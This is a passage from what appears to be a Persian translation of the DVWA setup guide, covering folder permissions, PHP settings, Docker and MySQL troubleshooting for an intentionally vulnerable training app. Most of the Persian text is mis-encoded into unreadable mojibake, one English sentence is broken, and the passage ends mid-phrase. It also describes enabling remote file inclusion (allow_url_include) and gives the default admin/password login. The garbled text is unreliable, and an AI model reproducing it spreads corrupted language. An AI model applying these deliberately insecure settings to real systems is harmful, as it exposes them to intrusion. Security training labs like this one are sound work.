Ų†ØŗØŽŲ‡â€ŒØ§ÛŒ Ø§Ø˛ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ ÚŠŲ‡ اØŦØąØ§ Ų…ی‌‌ڊŲ†ÛŒØ¯ØŒ Ų…Ų…ÚŠŲ† اØŗØĒ ب؎ŲˆØ§Ų‡ÛŒØ¯ Ø¯Øą ØĒŲ†Ø¸ÛŒŲ…اØĒ ŲžÛŒØ´â€ŒŲØąØļ ØĒØēÛŒÛŒØąØ§ØĒی ایØŦاد ÚŠŲ†ÛŒØ¯. Ų…Ø­Ų„ Ų‚ØąØ§ØąÚ¯ÛŒØąÛŒ ŲØ§ÛŒŲ„ Ų‡Ø§ Ø§Ø˛ Ų…اشیŲ†ÛŒ ØĒا Ų…اشیŲ† Ø¯ÛŒÚ¯Øą Ų…Ų…ÚŠŲ† اØŗØĒ Ų…ØĒŲØ§ŲˆØĒ باشد. + + +**ØŗØˇØ­ دØŗØĒØąØŗی بŲ‡ ŲžŲˆØ´Ų‡â€ŒŲ‡Ø§**: + +* `./hackable/uploads/` - باید ØĒŲˆØŗØˇ ØŗØąŲˆÛŒØŗ ŲˆØ¨ Ų‚ابŲ„ Ų†ŲˆØ´ØĒŲ† باشد (Ø¨ØąØ§ÛŒ ØĸŲžŲ„ŲˆØ¯ ŲØ§ÛŒŲ„). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - باید ØĒŲˆØŗØˇ ØŗØąŲˆÛŒØŗ ŲˆØ¨ Ų‚ابŲ„ Ų†ŲˆØ´ØĒŲ† باشد (Ø§Ú¯Øą Ų‚Øĩد اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ PHPIDS ØąØ§ Ø¯Ø§ØąÛŒØ¯ ). + +**ØĒŲ†Ø¸ÛŒŲ…اØĒ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ**: +* Ø¨ØąØ§ÛŒ Ų…ØŦØ§Ø˛ Ø´Ų…ØąØ¯Ų† ایŲ†ÚŠŲ„ŲˆØ¯Ų‡Ø§ÛŒ ØąÛŒŲ…ŲˆØĒ (RFI) + * ØĒŲ†Ø¸ÛŒŲ… `allow_url_include = on` Ų…ØŗØĒŲ†Ø¯Ø§ØĒ: [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * ØĒŲ†Ø¸ÛŒŲ… `allow_url_fopen = on` Ų…ØŗØĒŲ†Ø¯Ø§ØĒ: [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* Ø¨ØąØ§ÛŒ ؎اŲ…ŲˆØ´â€ŒÚŠØąØ¯Ų† Ų‡Ø´Ø¯Ø§Øąâ€ŒŲ‡Ø§ÛŒ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ ÚŠŲ‡ ÚŠŲ…ØĒØą Ø´Ų„ŲˆØē باشد (Ø¯Øą ØĩŲˆØąØĒ Ų†ÛŒØ§Ø˛) + * ØĒŲ†Ø¸ÛŒŲ… `display_errors = off` Ų…ØŗØĒŲ†Ø¯Ø§ØĒ: [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**File: `config/config.inc.php`**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - ایŲ† Ų…Ų‚Ø§Ø¯ÛŒØą باید Ø§Ø˛ ایŲ†ØŦا ایØŦاد Ø´ŲˆŲ†Ø¯: https://www.google.com/recaptcha/admin/create + +### Ø§ØˇŲ„اؚاØĒ ŲˆØąŲˆØ¯ ŲžÛŒØ´â€ŒŲØąØļ + +**Ų†Ø§Ų… ÚŠØ§ØąÛŒØąÛŒ ŲžÛŒØ´â€ŒŲØąØļ = `admin`** + +**ÚŠŲ„Ų…Ų‡ ؚبŲˆØą ŲžÛŒØ´â€ŒŲØąØļ = `password`** + +_...ÚŠŲ‡ بŲ‡ ØąØ§Ø­ØĒی Ų…ی‌ØĒŲˆØ§Ų†Ø¯ Ų…ŲˆØąØ¯ Ø­Ų…Ų„اØĒ Ø¨ØąŲˆØĒ‌ŲŲˆØąØŗ Ų‚ØąØ§Øą Ú¯ÛŒØąØ¯ ;)_ + +Ų†Ø´Ø§Ų†ÛŒ ŲˆØąŲˆØ¯: http://127.0.0.1/login.php + +_Ų†ÚŠØĒŲ‡: Ø§Ú¯Øą DVWA ØąØ§ Ø¯Øą Ų…ØŗÛŒØąŲ…ØĒŲØ§ŲˆØĒی Ų†Øĩب ÚŠØąØ¯Ų‡ باشد، ایŲ† Ų†ÛŒØ˛ Ø¨ØąØ§ÛŒ Ø´Ų…ا ØĒŲØ§ŲˆØĒ ØŽŲˆØ§Ų‡Ø¯ داشØĒ._ + +- - - + +## ڊاŲ†ØĒیŲ†Øą Ø¯Ø§ÚŠØą +_ایŲ† ب؎ش Ø§Ø˛ ØąØ§Ų‡Ų…Ų†Ų…ا ØĒŲˆØŗØˇ @thegrims Ø¨ØąØ§ÛŒ ŲžŲˆØ´Ø´ Ų…ØŗاØĻŲ„ Ų…ØąØ¨ŲˆØˇ بŲ‡ Ø¯Ø§ÚŠØą ایØŦاد شدŲ‡ اØŗØĒ. Ų„ØˇŲØ§Ų‹ Ø¯Øą ایŲ† ØąØ§Ø¨ØˇŲ‡ با ØĸŲ†Ų‡Ø§ یا@opsxcq، ÚŠØŗی ÚŠŲ‡ Ų†Ú¯Ų‡Ø¯Ø§ØąÛŒâ€ŒÚŠŲ†Ų†Ø¯Ų‡Ų” ایŲ…ÛŒØŦ Ø¯Ø§ÚŠØą Ųˆ Ų…ØŽØ˛Ų† اØŗØĒ ØĒŲ…اØŗ Ø¨Ú¯ÛŒØąÛŒØ¯. Ų‡Øą ØĒیڊØĒی ÚŠŲ‡ Ø¯Øą ایŲ†ØŦا Ø¨Ø˛Ų†ÛŒØ¯ احØĒŲ…اŲ„اŲ‹ با Ų‡Ų…ÛŒŲ† Ų…ØļŲ…ŲˆŲ† بØŗØĒŲ‡ ØŽŲˆØ§Ų‡Ø¯ شد._ + + +- [ØĩŲØ­Ų‡Ų” Ø¯Ø§ÚŠØąŲ‡Ø§Ø¨](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` +Ų„ØˇŲØ§Ų‹ بŲ‡ ØšŲ„ØĒ Ų…Ø´ÚŠŲ„اØĒ Ų‚دیŲ…ی‌ØĒØą Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ØŒ Ø§ØˇŲ…ÛŒŲ†Ø§Ų† حاØĩŲ„ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ Ø§Ø˛ aufs اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌ڊŲ†ÛŒØ¯. دØŗØĒŲˆØą `docker info` ØąØ§ Ø¨ØąØ§ÛŒ Ø§ØˇŲ„اؚ Ø§Ø˛ ØąØ§Ų‡â€ŒØ§Ų†Ø¯Ø§Ø˛ اØŗØĒŲˆØąÛŒØŦ ØŽŲˆØ¯ اØŦØąØ§ ÚŠŲ†ÛŒØ¯. Ø§Ú¯Øą Ø§Ø˛ ایŲ† Ø¯ØąØ§ÛŒŲˆØą اØŗØĒŲØ§Ø¯Ų‡ Ų†Ų…ی‌شŲˆØ¯ ØˇŲˆØąÛŒ ØĒØēÛŒÛŒØą دŲ‡ÛŒØ¯ ÚŠŲ‡ ایŲ† اØĒŲØ§Ų‚ بیŲØĒد. Ø¨ØąØ§ÛŒ ØŗیØŗØĒŲ…‌ؚاŲ…Ų„‌Ų‡Ø§ÛŒ Ų…ØŽØĒŲ„Ų ØąØ§Ų‡Ų†Ų…ایی Ø¯Øą Ų…ŲˆØąØ¯ چگŲˆŲ†Ú¯ÛŒ اŲ†ØŦاŲ… ایŲ† ÚŠØ§Øą ŲˆØŦŲˆØ¯ Ø¯Ø§ØąØ¯. Ų„یڊŲ† بŲ‡ ØšŲ„ØĒ ØĒŲ†ŲˆØš ØąŲˆØ´Ų‡Ø§ Ø¯Øą ایŲ† ب؎ش ŲžŲˆØ´Ø´ دادŲ‡ Ų†Ų…ی‌شŲˆŲ†Ø¯. + +- - - + +## اشڊاŲ„â€ŒØ˛Ø¯Ø§ÛŒÛŒ +Ø¯Øą ایŲ†ØŦا ŲØąØļ Ø¨Øą ایŲ† اØŗØĒ ÚŠŲ‡ Ø´Ų…ا Ø§Ø˛ یڊ ØĒŲˆØ˛ÛŒØš Ų„ÛŒŲ†ŲˆÚŠØŗ Ų…بØĒŲ†ÛŒ Ø¨Øą دبیاŲ†ØŒ Ø§Ø˛ ØŦŲ…Ų„Ų‡ ØŽŲˆØ¯ دبیاŲ†ØŒ ابŲˆŲ†ØĒŲˆ یا ڊاŲ„ÛŒ اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌ڊŲ†ÛŒØ¯. Ø¨ØąØ§ÛŒ ØŗØ§ÛŒØą ØĒŲˆØ˛ÛŒØšâ€ŒŲ‡Ø§ Ų†ÛŒØ˛ Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ایŲ† ØąØ§Ų‡Ų†Ų…ا ØąØ§ دŲ†Ø¨Ø§Ų„ ÚŠŲ†ÛŒØ¯ ŲˆŲ„ÛŒ دŲ‚ØĒ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ دØŗØĒŲˆØąØ§ØĒ ØąØ§ بŲ‡ Ø´ÚŠŲ„ Ų…Ų‚ØĒØļی ØĒØēÛŒÛŒØą دŲ‡ÛŒØ¯. + + + +### ØŗایØĒ ØąØ§ Ų…ØąŲˆØą Ų…ی‌ڊŲ†Ų…ØŒ ŲˆŲ„ÛŒ ØŽØˇØ§ÛŒ Û´Û°Û´ Ų…ÛŒâ€ŒÚ¯ÛŒØąŲ… +Ø§Ú¯Øą Ø´Ų…ا ایŲ† ØŽØˇØ§ ØąØ§ Ø¯ØąÛŒØ§ŲØĒ Ų…ی‌ڊŲ†ÛŒØ¯ØŒ Ų†ÛŒØ§Ø˛ اØŗØĒ ØĒØŗبØĒ بŲ‡ Ų…Ø­Ų„ ŲØ§ÛŒŲ„‌Ų‡Ø§ ØĸگاŲ‡ÛŒ بیشØĒØąÛŒ ÚŠØŗب ÚŠŲ†ÛŒØ¯. بŲ‡â€ŒØ´ÚŠŲ„ ŲžÛŒØ´â€ŒŲØąØļ، ŲžŲˆØ´Ų‡Ų” ØąÛŒØ´Ų‡Ų” ŲØ§ÛŒŲ„Ų‡Ø§ÛŒ ØĸŲžØ§Ú†ÛŒ (ØŦایی ÚŠŲ‡ ØĸŲ† ØąØ§ بŲ‡â€ŒØ¯Ų†Ø¨Ø§Ų„ Ų…Ø­ØĒŲˆØ§ÛŒ ŲˆØ¨ÛŒ ØŦØŗØĒØŦŲˆ Ų…ی‌ڊŲ†Ø¯)، Ø¯Øą `/var/www/html` ŲˆØ§Ų‚Øš شدŲ‡ اØŗØĒ. Ø§Ú¯Øą Ø´Ų…ا ŲØ§ÛŒŲ„ `hello.txt` ØąØ§ Ø¯Øą ØĸŲ† Ų‚ØąØ§Øą دŲ‡ÛŒØ¯ØŒ Ø¨ØąØ§ÛŒ Ų…ØąŲˆØą ØĸŲ† Ų…ی‌بایØŗØĒ Ø§Ø˛ ØĸØ¯ØąØŗ `http://localhost/hello.txt` اØŗØĒŲØ§Ø¯Ų‡ ÚŠŲ†ÛŒØ¯. + +Ų„یڊŲ† Ø§Ú¯Øą یڊ ŲžŲˆØ´Ų‡ Ø¯Øą ØĸŲ†ØŦا Øŗا؎ØĒŲ‡â€ŒØ§ÛŒØ¯ Ųˆ ŲØ§ÛŒŲ„ ØąØ§ Ø¯ØąŲˆØĒ ØĸŲ† Ų‚ØąØ§Øą دادŲ‡â€ŒØ§ÛŒØ¯ - `/var/www/html/mydir/hello.txt` - Ų…ی‌بایØŗØĒ Ø¨ØąØ§ÛŒ Ų…ØąŲˆØą ØĸŲ† Ø§Ø˛ ØĸØ¯ØąØŗ `http://localhost/mydir/hello.txt` اØŗØĒŲØ§Ø¯Ų‡ ÚŠŲ†ÛŒØ¯. + +ØŗیØŗØĒŲ… ؚاŲ…Ų„ Ų„ÛŒŲ†ŲˆÚŠØŗ، Ų†ØŗبØĒ بŲ‡ Ø¨Ø˛ØąÚ¯ÛŒ Ųˆ ÚŠŲˆÚ†ÚŠÛŒ Ø­ØąŲˆŲ Ø­ØŗاØŗ اØŗØĒ. Ų„ذا Ø¯Øą Ų…ØĢاŲ„ باŲ„ا ØĒŲ„اش Ø¨ØąØ§ÛŒ Ų…ØąŲˆØą Ų‡ØąÚŠØ¯Ø§Ų… Ø§Ø˛ ØĸØ¯ØąØŗ‌Ų‡Ø§ÛŒ Ø˛ÛŒØą Ų†ÛŒØ˛ بŲ‡ Ø´Ų…ا ØŽØˇØ§ÛŒ Û´Û°Û´ ØąØ§ Ú¯Ø˛Ø§ØąØ´ ØŽŲˆØ§Ų‡Ø¯ داد: + + + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +ایŲ† چŲ‡ ØĒØŖØĢÛŒØąÛŒ Ø¨Øą ØąŲˆÛŒ DVWA‌؎ŲˆØ§Ų‡Ø¯ داشØĒ؟ بØŗÛŒØ§ØąÛŒ Ø§Ø˛ Ų…ØąØ¯Ų… با اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ گیØĒ، DVWA ØąØ§ Ø¯Øą ŲžŲˆØ´Ų‡Ų” `/var/www/html` داŲ†Ų„ŲˆØ¯ Ų…ی‌ڊŲ†Ų†Ø¯. ایŲ† Ų…Ų†ØŦØą بŲ‡ ایØŦاد ŲžŲˆØ´Ų‡Ų” `/var/www/html/DVWA/` ØŽŲˆØ§Ų‡Ø¯ شد ÚŠŲ‡ ØĒŲ…اŲ… ŲØ§ÛŒŲ„‌Ų‡Ø§ÛŒ DVWA Ø¯ØąŲˆŲ† ØĸŲ† Ų‚ØąØ§Øą Ų…ÛŒâ€ŒÚ¯ÛŒØąŲ†Ø¯. ŲžØŗ Ø§Ø˛ ØĸŲ† ØŗØąØ§Øē ØĸŲžØ§Ú†ÛŒ ØąŲØĒŲ‡ Ųˆ `http://localhost/` ØąØ§ Ų…ØąŲˆØą ÚŠØąØ¯Ų‡ Ųˆ با ØŽØˇØ§ÛŒ Û´Û°Û´ یا ØĩŲØ­Ų‡Ų” ØŽŲˆØ´â€ŒØĸŲ…دگŲˆÛŒÛŒ ØĸŲžØ§Ú†ÛŒ Ų…ŲˆØ§ØŦŲ‡ Ų…ی‌شŲˆŲ†Ø¯. Ø§Ø˛ ØĸŲ†ØŦایی ÚŠŲ‡ ŲØ§ÛŒŲ„‌Ų‡Ø§ Ø¯ØąŲˆŲ† ŲžŲˆØ´Ų‡Ų” DVWA Ų‚ØąØ§Øą Ø¯Ø§ØąŲ†Ø¯ØŒ باید بØŦای ØĸŲ†ØŒ ØĸØ¯ØąØŗ `http://localhost/DVWA` ØąØ§ Ų…ØąŲˆØą ÚŠØąØ¯. + +اشØĒباŲ‡ ØąØ§ÛŒØŦ Ø¯ÛŒÚ¯Øą اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ ØĸØ¯ØąØŗ `http://localhost/dvwa` اØŗØĒ ÚŠŲ‡ Ø¨Ø§Ø˛ Ų‡Ų… ØŽØˇØ§ÛŒ Û´Û°Û´ ØąØ§ ØŽŲˆØ§Ų‡Ø¯ داد. Ú†ØąØ§ÚŠŲ‡ `dvwa` با `DVWA` ØˇØ¨Ų‚ Ų…ØšÛŒØ§ØąŲ‡Ø§ÛŒ ØĒØˇØ¨ÛŒŲ‚ Ų†Ø§Ų… ŲžŲˆØ´Ų‡ Ø¯Øą Ų„ÛŒŲ†ŲˆÚŠØŗ یڊی Ų†ÛŒØŗØĒŲ†Ø¯. + +بŲ†Ø§Ø¨ØąÛŒŲ† ŲˆŲ‚ØĒی ŲžØŗ Ø§Ø˛ Ų†Øĩب با ØŽØˇØ§ÛŒ `404` Ų…ŲˆØ§ØŦŲ‡ شدید، یڊ Ų…ØąØĒبŲ‡ Ų…ØąŲˆØą ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ ŲØ§ÛŒŲ‡Ø§ ØąØ§ Ø¯Øą ÚŠØŦا Ų†Øĩب ÚŠØąØ¯Ų‡â€ŒØ§ÛŒØ¯ØŒ Ų†ØŗبØĒ بŲ‡ ŲžŲˆØ´Ų‡Ų” ØąÛŒØ´Ų‡Ų” ŲØ§ÛŒŲ„Ų‡Ø§ Ø¯Øą چŲ‡ Ų…ŲˆŲ‚ØšÛŒØĒی Ų‚ØąØ§Øą Ú¯ØąŲØĒŲ‡â€ŒØ§Ų†Ø¯ Ųˆ Ø¨Ø˛ØąÚ¯ÛŒ Ųˆ ÚŠŲˆÚ†ÚŠÛŒ Ø­ØąŲˆŲ Ø¯Øą Ų†Ø§Ų… ŲžŲˆØ´Ų‡â€ŒŲ‡Ø§ÛŒ اØŗØĒŲØ§Ø¯Ų‡â€ŒØ´Ø¯Ų‡ چŲ‡ Ø´ÚŠŲ„ÛŒ اØŗØĒ. + + +### ØŽØˇØ§ÛŒ"Access denied" Ų…ŲˆŲ‚Øš اØŦØąØ§ÛŒ Ų†Øĩب +Ø§Ú¯Øą حیŲ† اØŦØąØ§ÛŒ اØŗÚŠØąÛŒŲžØĒ Ų†Øĩب ایŲ† ØŽØˇØ§ ØąØ§ Ø¯ØąÛŒØ§ŲØĒ Ų…ی‌ڊŲ†ÛŒØ¯ØŒ بداŲ† Ų…ØšŲ†ÛŒ اØŗØĒ ÚŠŲ‡ Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ Ųˆ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą ØĒŲ†Ø¸ÛŒŲ…‌شدŲ‡ Ø¯Øą Ų‚ایŲ„ ØĒŲ†Ø¸ÛŒŲ…اØĒ با ØĸŲ†Ú†Ų‡ Ø¯Øą ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØĒŲ†Ø¸ÛŒŲ… شدŲ‡ اØŗØĒ ØĒØˇØ§Ø¨Ų‚ Ų†Ø¯Ø§ØąØ¯: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +ایŲ† ŲžÛŒØ§Ų… ØŽØˇØ§ بŲ‡ Ø´Ų…ا Ų…ی‌گŲˆÛŒØ¯ ÚŠŲ‡ Ø¯Øą حاŲ„ اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ `notdvwa` Ų‡ØŗØĒید. + + +ŲžÛŒØ§Ų… ØŽØˇØ§ÛŒ بؚدی بŲ‡ Ø´Ų…ا Ų…ی‌گŲˆÛŒØ¯ Ø¯Øą ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡Ų” اشØĒباŲ‡ÛŒ Ø§Ø´Ø§ØąŲ‡ ÚŠØąØ¯Ų‡â€ŒØ§ÛŒØ¯. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +ایŲ† بŲ‡ Ø´Ų…ا Ų…ی‌گŲˆÛŒØ¯ ÚŠŲ‡ با اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ `dvwa` Ø¯Øą حاŲ„ ØĒŲ„اش Ø¨ØąØ§ÛŒ اØĒØĩاŲ„ بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡Ų” `notdvwa` Ų‡ØŗØĒید. +اŲˆŲ„ÛŒŲ† Ų‚دŲ… ایŲ† اØŗØĒ ÚŠŲ‡ ÚŠŲ†ØĒØąŲ„ ÚŠŲ†ÛŒØ¯ Øĸیا ØĸŲ† Ú†ÛŒØ˛ÛŒ ÚŠŲ‡ ŲÚŠØą Ų…ی‌ڊŲ†ÛŒØ¯ Ø¯Øą ڊاŲ†ŲÛŒÚ¯ ŲØ§ÛŒŲ„ ØĒŲ†Ø¸ÛŒŲ… ÚŠØąØ¯Ų‡â€ŒØ§ÛŒØ¯ ŲˆØ§Ų‚ؚاŲ‹ Ø¯Øą ØĸŲ†ØŦا ŲˆØŦŲˆØ¯ Ø¯Ø§ØąØ¯ یا ØŽÛŒØą. + +Ø§Ú¯Øą ØĒŲ†Ø¸ÛŒŲ…اØĒ با ØĸŲ†Ú†Ų‡ اŲ†ØĒØ¸Ø§ØąØ´ ØąØ§ داشØĒید Ų…ØˇØ§Ø¨Ų‚ØĒ Ų…ی‌ڊŲ†Ø¯ØŒ Ų…ØąØ­Ų„Ų‡Ų” بؚدی ØĒŲ„اش Ø¨ØąØ§ÛŒ ŲˆØąŲˆØ¯ با Ų†Ø§Ų… ÚŠØ§ØąÛŒØąÛŒ Ø§Ø˛ ØˇØąÛŒŲ‚ ØŽØˇ ŲØąŲ…اŲ† اØŗØĒ. با ŲØąØļ Ø¨Øą ایŲ†ÚŠŲ‡ Ø´Ų…ا یڊ Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ با Ų†Ø§Ų… `dvwa` Ųˆ یڊ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą با Ų…Ų‚Ø¯Ø§Øą `p@ssw0rd` Ø¯Ø§ØąÛŒØ¯ØŒ Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ دØŗØĒŲˆØą Ø˛ÛŒØą ØąØ§ اØŦØąØ§ ÚŠŲ†ÛŒØ¯: + + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*دŲ‚ØĒ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ Ų‡ÛŒÚ† ŲØ§ØĩŲ„Ų‡Ų” ؎اŲ„ÛŒ بؚد Ø§Ø˛ p- Ų‚ØąØ§Øą Ų†Ø¯Ø§ØąØ¯* + +Ø§Ú¯Øą یڊ چŲ†ÛŒŲ† Ú†ÛŒØ˛ÛŒ Ų…ی‌بیŲ†ÛŒØ¯ØŒ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą Ø´Ų…ا Øĩحیح اØŗØĒ: + + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Ø§Ø˛ ØĸŲ†ØŦا ÚŠŲ‡ Ø§Ø˛ ØˇØąÛŒŲ‚ ØŽØˇ ŲØąŲ…اŲ† بŲ‡ Ø´ÚŠŲ„ Ų…ŲˆŲŲ‚ÛŒØĒ ØĸŲ…ÛŒØ˛ ØĒŲˆØ§Ų†ØŗØĒŲ‡â€ŒØ§ÛŒØ¯ Ų…ØĒØĩŲ„ Ø´ŲˆÛŒØ¯ØŒ بŲ‡ احØĒŲ…اŲ„ Ø˛ÛŒØ§Ø¯ Ú†ÛŒØ˛ÛŒ Ø¯Øą ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ اشØĒباŲ‡ اØŗØĒ. Ų…ØŦدداŲ‹ ØĸŲ† ØąØ§ ÚŠŲ†ØĒØąŲ„ ÚŠŲ†ÛŒØ¯ Ųˆ Ø§Ú¯Øą Ų‡Ų…Ú†Ų†Ø§Ų† Ų†ØĒŲˆØ§Ų†ØŗØĒید Ų…ŲˆŲŲ‚ Ø´ŲˆÛŒØ¯ یڊ issue Ø¨ØąØ§ÛŒ ØąØŗیدگی ایØŦاد ÚŠŲ†ÛŒØ¯. + +Ø§Ú¯Øą چŲ†ÛŒŲ† Ú†ÛŒØ˛ÛŒ Ų…ی‌بیŲ†ÛŒØ¯ØŒ یا Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ یا ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØąØĒاŲ† اشØĒباŲ‡ اØŗØĒ. Ų…ØąØ§Ø­Ų„ [Ų†Øĩب ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡](#database-setup) ØąØ§ Ų…ØŦدداŲ‹ ØĒÚŠØąØ§Øą ÚŠŲ†ÛŒØ¯ Ųˆ Ø§ØˇŲ…ÛŒŲ†Ø§Ų† حاØĩŲ„ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ Ø¯Øą ÚŠŲ„ ایŲ† ŲØąØ§ÛŒŲ†Ø¯ Ø§Ø˛ Ų‡Ų…اŲ† Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ Ųˆ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌ڊŲ†ÛŒØ¯. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` +Ø§Ú¯Øą ØŽØˇØ§ÛŒ Ø˛ÛŒØą ØąØ§ Ų…ÛŒâ€ŒÚ¯ÛŒØąÛŒØ¯ØŒ بدیŲ† Ų…ØšŲ†Ø§ اØŗØĒ ÚŠŲ‡ Ų†Ø§Ų… ÚŠØ§ØąØ¨ØąÛŒ Ųˆ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą Ø´Ų…ا Øĩحیح اØŗØĒ، Ų„بڊŲ† ØŗØˇØ­ دØŗØĒØąØŗی ØĸŲ† بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ڊاŲÛŒ Ų†ÛŒØŗØĒ. Ø¯Øą ایŲ† حاŲ„ØĒ Ų†ÛŒØ˛ Ų…ØąØ§Ø­Ų„ Ų†Øĩب ØąØ§ ØĒÚŠØąØ§Øą ÚŠŲ†ÛŒØ¯ Ųˆ Ų†Ø§Ų… ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡â€ŒØ§ÛŒ ÚŠŲ‡ بŲ‡ ØĸŲ† Ų…ØĒØĩŲ„ Ų…ی‌شŲˆÛŒØ¯ ØąØ§ چک ÚŠŲ†ÛŒØ¯. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +ØĸØŽØąÛŒŲ† ØŽØˇØ§ÛŒÛŒ ÚŠŲ‡ Ų…Ų…ÚŠŲ† اØŗØĒ Ø¯ØąÛŒØ§ŲØĒ ÚŠŲ†ÛŒØ¯ Ų†ÛŒØ˛ بŲ‡ Ø´ØąØ­ Ø˛ÛŒØą اØŗØĒ: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` +ایŲ† یڊ ØŽØˇØ§ÛŒ ŲˆØąŲˆØ¯ Ų†ÛŒØŗØĒ، Ų„یڊŲ† بŲ‡ Ø´Ų…ا Ų…ی‌گŲˆÛŒØ¯ ÚŠŲ‡ ØŗØąŲˆØą ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ Ø¯Øą حاŲ„ اØŦØąØ§ Ų†ÛŒØŗØĒ. ØĸŲ† ØąØ§ با دØŗØĒŲˆØą Ø˛ÛŒØą اØŦØąØ§ ÚŠŲ†ÛŒØ¯: + + +```sh +sudo service mysql start +``` + +### ØąŲˆØ´ ŲˆØąŲˆØ¯ Ų†Ø§Ø´ØĒا؎ØĒŲ‡ +Ø¯Øą Ų†ØŗØŽŲ‡â€ŒŲ‡Ø§ÛŒ ØŦدیدØĒØą Ų…ای‌اØŗ‌ڊیŲˆØ§Ų„ØŒ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ Ø¯ÛŒÚ¯Øą Ų†Ų…ی‌ØĒŲˆØ§Ų†Ø¯ Ø¯Øą حاŲ„ØĒ ØĒŲ†Ø¸ÛŒŲ…اØĒ ŲžÛŒØ´â€ŒŲØąØļ با ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ Ø§ØąØĒØ¨Ø§Øˇ Ø¨ØąŲ‚ØąØ§Øą ÚŠŲ†Ø¯. Ø§Ú¯Øą حیŲ† ØĒŲ„اش Ø¨ØąØ§ÛŒ اØŦØąØ§ÛŒ اØŗÚŠØąÛŒŲžØĒ Ų†Øĩب ایŲ† ØŽØˇØ§ ØąØ§ Ų…ÛŒâ€ŒÚ¯ÛŒØąÛŒØ¯ بŲ‡ ایŲ† Ų…ŲˆØļŲˆØš بیŲ†Ø¯ÛŒØ´ÛŒØ¯. + +With the most recent versions of MySQL, PHP can no longer talk to the database in its default configuration. If you try to run the setup script and get the following message it means you have configuration. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` +دŲˆ ØąØ§Ų‡ Ø­Ų„ ŲžÛŒØ´ ØąŲˆ Ø¯Ø§ØąÛŒØ¯ ÚŠŲ‡ ØĸØŗاŲ†â€ŒØĒØąÛŒŲ† ØĸŲ†Ų‡Ø§ حذŲ Ų…ای‌اØŗ‌ڊیŲˆâ€ŒØ§Ų„ Ųˆ Ų†Øĩب Ų…Ø§ØąÛŒØ§Ø¯ÛŒâ€ŒØ¨ÛŒ بØŦای ØĸŲ† اØŗØĒ. Ø¯Øą ŲžØ§ÛŒÛŒŲ† Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ØąØ§Ų‡Ų†Ų…ای ØąØŗŲ…ÛŒ ŲžØąŲˆÚ˜Ų‡Ų” Ų…Ø§ØąÛŒØ§Ø¯ÛŒâ€ŒØ¨ÛŒ ØąØ§ ببیŲ†ÛŒØ¯: + + + +ØąØ§Ų‡â€ŒØ­Ų„ Ø¯ÛŒÚ¯Øą 